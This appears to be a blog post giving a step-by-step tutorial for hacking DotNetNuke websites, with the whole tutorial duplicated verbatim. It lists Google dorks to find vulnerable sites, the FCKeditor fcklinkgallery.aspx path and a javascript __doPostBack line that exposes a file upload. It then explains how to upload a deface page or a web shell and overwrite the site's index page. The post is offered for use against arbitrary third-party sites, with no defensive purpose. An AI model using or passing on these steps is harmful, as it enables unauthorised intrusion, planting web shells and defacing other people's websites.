DNN means Dot Net Nuke.
This is the most easiest web hacking way. I will describe it in some few steps.
Step 1:
Go to www.google.com
Step 2:
Now enter any of these google dorks
inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
You will get a result like below:
Google automatically detect vulnerable sites.
Step 3:
Now choose anyone. Suppose I choose www.example.com/Home/tabid/36/language/en-US/Default.aspx
Now replace
/Home/tabid/36/Language/en-US/Default.aspx
with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Then you will see like below:
Then click on "File"
then paste javascript in the browser which is given below:
javascript:__doPostBack('ctlURL$cmdUpload','')
See the change? You have got a upload option.
Step 4:
Now upload your deface page. Choose the file and click on upload.
Step 5:
See your uploaded file in http://www.example.com/portals/0/yourfilename
Step 6:
If you want to upload shell then 1st download shell from here.
Then choose shell and upload it.
again you can find your uploaded shell from http://www.example.com/portals/0/shellname.jpg
Now you can see the admin. If you want to index hacking then just find index.html or index.htm or index.php
Click edit and paste your deface page source code there. Now save. :D
By this you can fully deface a website.
This is the most easiest web hacking way. I will describe it in some few steps.
Step 1:
Go to www.google.com
Step 2:
Now enter any of these google dorks
inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
You will get a result like below:
Google automatically detect vulnerable sites.
Step 3:
Now choose anyone. Suppose I choose www.example.com/Home/tabid/36/language/en-US/Default.aspx
Now replace
/Home/tabid/36/Language/en-US/Default.aspx
with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Then you will see like below:
Then click on "File"
then paste javascript in the browser which is given below:
javascript:__doPostBack('ctlURL$cmdUpload','')
See the change? You have got a upload option.
Step 4:
Now upload your deface page. Choose the file and click on upload.
Step 5:
See your uploaded file in http://www.example.com/portals/0/yourfilename
Step 6:
If you want to upload shell then 1st download shell from here.
Then choose shell and upload it.
again you can find your uploaded shell from http://www.example.com/portals/0/shellname.jpg
Now you can see the admin. If you want to index hacking then just find index.html or index.htm or index.php
Click edit and paste your deface page source code there. Now save. :D
By this you can fully deface a website.
No comments:
Post a Comment